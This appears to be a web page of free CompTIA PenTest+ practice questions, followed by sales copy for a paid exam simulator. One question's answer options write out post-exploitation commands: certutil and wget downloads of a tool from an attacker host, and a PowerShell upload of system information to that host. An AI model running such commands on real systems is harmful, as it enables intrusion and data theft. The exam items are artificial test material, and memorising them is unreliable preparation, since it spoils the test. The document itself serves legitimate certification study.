20:00

PDF|

Guide for CompTIA PenTest+ Certification Exam

Quiz CompTIA PenTest+ Certification Exam

Free Test
/ 10

Quiz

1/10
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
Select the answer
1 correct answer
A.
Ensure the client has signed the SOW.
B.
Verify the client has granted network access to the hot site.
C.
Determine if the failover environment relies on resources not owned by the client.
D.
Establish communication and escalation procedures with the client.

Quiz

2/10
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
Select the answer
1 correct answer
A.
devices produce more heat and consume more power.
B.
devices are obsolete and are no longer available for replacement.
C.
protocols are more difficult to understand.
D.
devices may cause physical world effects.

Quiz

3/10
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
Select the answer
1 correct answer
A.
NDA
B.
MSA
C.
SOW
D.
MOU

Quiz

4/10
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
Select the answer
1 correct answer
A.
PLCs will not act upon commands injected over the network.
B.
Supervisors and controllers are on a separate virtual network by default.
C.
Controllers will not validate the origin of commands.
D.
Supervisory systems will detect a malicious injection of code/commands.

Quiz

5/10
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
Select the answer
1 correct answer
A.
A signed statement of work
B.
The correct user accounts and associated passwords
C.
The expected time frame of the assessment
D.
The proper emergency contacts for the client

Quiz

6/10
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
Select the answer
1 correct answer
A.
certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe
B.
powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)
C.
schtasks /query /fo LIST /v | find /I “Next Run Time:”
D.
wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Quiz

7/10
HOTSPOT You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. Certification Exam CompTIA PenTest+ Certification Exam CompTIA CompTIA-PT0-002 2-1030486010 v
Select the answer
1 correct answer
Option is correct. 1. Reflected XSS - Input sanitization (<> ...) 2. Sql Injection Stacked - Parameterized Queries 3. DOM XSS - Input Sanitization (<> ...) 4. Local File Inclusion - sandbox req 5. Command Injection - sandbox req 6. SQLi union - paramtrized queries 7. SQLi error - paramtrized queries 8. Remote File Inclusion - sandbox 9. Command Injection - input saniti $ 10. URL redirect - prevent external calls

Quiz

8/10
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
Select the answer
1 correct answer
A.
S/MIME
B.
FTPS
C.
DNSSEC
D.
AS2

Quiz

9/10
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: • The following request was intercepted going to the network device: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 v Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk • Network management interfaces are available on the production network. • An Nmap scan returned the following: Certification Exam CompTIA PenTest+ Certification Exam CompTIA CompTIA-PT0-002 3-4026027830 Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
Select the answer
2 correct answers
A.
Enforce enhanced password complexity requirements.
B.
Disable or upgrade SSH daemon.
C.
Disable HTTP/301 redirect configuration.
D.
Create an out-of-band network for management.
E.
Implement a better method for authentication.
F.
Eliminate network management and control interfaces.

Quiz

10/10
A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
Select the answer
1 correct answer
A.
Windows
B.
Apple
C.
Linux
D.
Android
Looking for more questions?Buy now

CompTIA PenTest+ Certification Exam Practice test unlocks all online simulator questions

Thank you for choosing the free version of the CompTIA PenTest+ Certification Exam practice test! Further deepen your knowledge on CompTIA Simulator; by unlocking the full version of our CompTIA PenTest+ Certification Exam Simulator you will be able to take tests with over 308 constantly updated questions and easily pass your exam. 98% of people pass the exam in the first attempt after preparing with our 308 questions.

BUY NOW

What to expect from our CompTIA PenTest+ Certification Exam practice tests and how to prepare for any exam?

The CompTIA PenTest+ Certification Exam Simulator Practice Tests are part of the CompTIA Database and are the best way to prepare for any CompTIA PenTest+ Certification Exam exam. The CompTIA PenTest+ Certification Exam practice tests consist of 308 questions and are written by experts to help you and prepare you to pass the exam on the first attempt. The CompTIA PenTest+ Certification Exam database includes questions from previous and other exams, which means you will be able to practice simulating past and future questions. Preparation with CompTIA PenTest+ Certification Exam Simulator will also give you an idea of the time it will take to complete each section of the CompTIA PenTest+ Certification Exam practice test . It is important to note that the CompTIA PenTest+ Certification Exam Simulator does not replace the classic CompTIA PenTest+ Certification Exam study guides; however, the Simulator provides valuable insights into what to expect and how much work needs to be done to prepare for the CompTIA PenTest+ Certification Exam exam.

BUY NOW

CompTIA PenTest+ Certification Exam Practice test therefore represents an excellent tool to prepare for the actual exam together with our CompTIA practice test . Our CompTIA PenTest+ Certification Exam Simulator will help you assess your level of preparation and understand your strengths and weaknesses. Below you can read all the quizzes you will find in our CompTIA PenTest+ Certification Exam Simulator and how our unique CompTIA PenTest+ Certification Exam Database made up of real questions:

Info quiz:

  • Quiz name:CompTIA PenTest+ Certification Exam
  • Total number of questions:308
  • Number of questions for the test:50
  • Pass score:80%

You can prepare for the CompTIA PenTest+ Certification Exam exams with our mobile app. It is very easy to use and even works offline in case of network failure, with all the functions you need to study and practice with our CompTIA PenTest+ Certification Exam Simulator.

Use our Mobile App, available for both Android and iOS devices, with our CompTIA PenTest+ Certification Exam Simulator . You can use it anywhere and always remember that our mobile app is free and available on all stores.

Our Mobile App contains all CompTIA PenTest+ Certification Exam practice tests which consist of 308 questions and also provide study material to pass the final CompTIA PenTest+ Certification Exam exam with guaranteed success. Our CompTIA PenTest+ Certification Exam database contain hundreds of questions and CompTIA Tests related to CompTIA PenTest+ Certification Exam Exam. This way you can practice anywhere you want, even offline without the internet.

BUY NOW